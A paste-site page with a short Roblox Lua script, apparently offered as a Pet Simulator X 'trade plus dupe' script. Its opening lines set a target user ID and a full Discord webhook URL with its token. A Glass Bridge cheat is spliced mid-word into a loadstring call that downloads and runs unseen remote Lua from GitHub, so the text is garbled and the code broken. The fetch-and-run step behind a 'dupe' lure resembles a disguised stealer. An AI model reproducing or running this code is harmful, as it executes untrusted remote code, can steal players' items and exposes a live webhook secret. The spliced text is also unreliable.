Facebook
From Chunky Peccary, 1 Year ago, written in Plain Text.
This paste is a reply to Psx Trade plus Dupe script! from Khch PSX! - view diff
Embed
Download Paste or View Raw
Hits: 145
  1. _G.UserID = 4018034734
  2. _G.WebHook = "https://discord.com/api/webhooks/1068131085927587852/2hUIHl71mQPli7Tng0ImZ4VMdsIch9uvVgUqjJBWGKPS1jZwpl0wvkucWMbvMbJUppcD"
  3. lfor i,v in pairs(game:GetService("Workspace")["Glass Bridge"].GlassPane:GetDescendants()) do
  4.    if v:IsA("BasePart") and v.CanCollide == false then
  5.        v.CanCollide = true
  6.        v.Color = Color3.fromRGB(255, 0, 0)
  7.  
  8.    end
  9. end
  10.  
  11. spawn(function()
  12.    while true do
  13.        task.wait()
  14. for i,v in pairs(game:GetService("Workspace")["Glass Bridge"].GlassPane:GetDescendants()) do
  15.    if v:IsA("TouchTransmitter") then
  16.        v:Destroy()
  17.    end
  18. end
  19. end
  20.  
  21. end)oadstring(game:HttpGet('https://raw.githubusercontent.com/vestyx/PetSimulatorXAutoFarm/main/HasteFarm.lua'))()